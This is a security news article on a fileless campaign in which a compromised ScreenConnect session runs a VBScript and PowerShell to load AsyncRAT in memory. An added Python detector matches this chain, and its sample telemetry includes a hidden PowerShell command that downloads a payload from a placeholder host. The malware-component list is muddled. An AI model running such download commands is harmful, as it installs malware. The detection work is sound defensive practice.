
Stealthy Fileless Malware Spreads RAT via Legitimate Tools

Summary

– A fileless malware campaign uses legitimate tools like ScreenConnect to bypass disk-based detection by executing malicious code entirely in memory.
– The attack begins with a compromised ScreenConnect client, leading to the execution of a VBScript that downloads and loads payloads directly into memory without writing files to disk.
– A first-stage .NET assembly, Obfuscator.dll, establishes persistence via a scheduled task and disables Windows security logging to evade detection.
– The malware ultimately delivers AsyncRAT, a remote access Trojan that performs reconnaissance, executes commands, and exfiltrates sensitive data like credentials and browser artifacts.
– Researchers emphasize that understanding these techniques enables the creation of targeted detection signatures and supports endpoint hardening against such threats.

A highly sophisticated fileless malware operation has been identified, leveraging trusted system utilities to distribute a dangerous remote access Trojan while evading conventional security measures. This in-memory attack strategy leaves minimal forensic traces, complicating both detection and remediation efforts for defenders.

Security analysts have traced the infection chain to a compromised ScreenConnect client, a popular remote administration tool. Attackers initiated an interactive session using the domain relay.shipperzone[.]online, which has been associated with unauthorized deployments of the software. Within this session, a VBScript named Update.vbs was executed via WScript, triggering a PowerShell command to retrieve two payloads from the internet.

These payloads, identified as logs.ldk and logs.ldr, were saved within the C:\Users\Public\ directory but never persisted as executable files on the disk. Instead, they were loaded directly into memory using reflection techniques. One payload was transformed into a byte array, while the other was executed in-memory. The script fetched encoded data from a remote server, decoded it within memory, and invoked a .NET assembly to proceed with the attack, a signature characteristic of fileless malware campaigns.
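The process chain described above (a ScreenConnect client launching wscript.exe on Update.vbs, which launches PowerShell to stage .ldk/.ldr payloads under C:\Users\Public\) is the kind of behaviour a defender can match on. The following detection logic is an added example, not code from the article or the researchers; the event layout, the sample telemetry and the placeholder C2 host are constructed.

```python
import ntpath
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation event; this field layout is an assumption."""
    pid: int
    ppid: int
    image: str
    cmdline: str

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Payload names the article reports: .ldk/.ldr files staged under C:\Users\Public\
PUBLIC_PAYLOAD = re.compile(r"C:\\Users\\Public\\[^\s\"']+\.(?:ldk|ldr)\b", re.I)

def ancestry(event, by_pid, depth=4):
    """Lower-cased image basenames of the event and up to depth-1 ancestors."""
    chain, cur = [], event
    while cur is not None and len(chain) < depth:
        chain.append(ntpath.basename(cur.image).lower())
        cur = by_pid.get(cur.ppid)
    return chain

def detect(events):
    """Return (pid, rule) tuples for events matching the ScreenConnect -> script host -> PowerShell chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        chain = ancestry(e, by_pid)
        name, parents = chain[0], chain[1:]
        # Rule 1: a script host launched beneath a ScreenConnect client process.
        if name in SCRIPT_HOSTS and any("screenconnect" in p for p in parents):
            alerts.append((e.pid, "script-host-from-screenconnect"))
        # Rule 2: PowerShell descended from a script host and referencing the staged payload names.
        if name == "powershell.exe" and SCRIPT_HOSTS & set(parents) and PUBLIC_PAYLOAD.search(e.cmdline):
            alerts.append((e.pid, "powershell-public-payload-fetch"))
    return alerts

# Constructed sample telemetry (not real logs); c2.example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    ProcEvent(4000, 800, r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe", "ScreenConnect.ClientService.exe"),
    ProcEvent(4120, 4000, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\Public\Update.vbs"'),
    ProcEvent(4188, 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -c "iwr http://c2.example.invalid/logs.ldk -OutFile C:\Users\Public\logs.ldk"'),
    ProcEvent(5000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),                                    # benign
    ProcEvent(5010, 5000, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Scripts\inventory.vbs"'),  # benign: admin script
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} rule={rule}")
```

The benign wscript.exe launched from explorer.exe does not fire, which is the point of keying on the parent chain rather than on the script host alone.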

The infection process then advanced with a first-stage .NET assembly called Obfuscator.dll, which served as a launcher for the AsyncRAT payload. Analysis uncovered three central classes within this component:

  • Class A, responsible for initializing the runtime environment. This modular architecture allowed the malware to operate discreetly while preparing the system for the final stage of the attack.
  • AsyncClient.exe functioned as the command-and-control engine, maintaining persistent access, conducting system reconnaissance, and executing commands issued by the attacker.
  • Its capabilities included decrypting AES-256-encrypted embedded settings, among them C2 server domains such as 3osch20[.]duckdns[.]org.

By deconstructing these elements, cybersecurity professionals can better understand how the malware achieves persistence, loads additional modules dynamically, and harvests sensitive data such as credentials, clipboard contents, and browser artifacts. These insights are instrumental in developing targeted detection rules and strengthening endpoint defenses based on observed malicious behaviors.

(Source: Infosecurity Magazine)
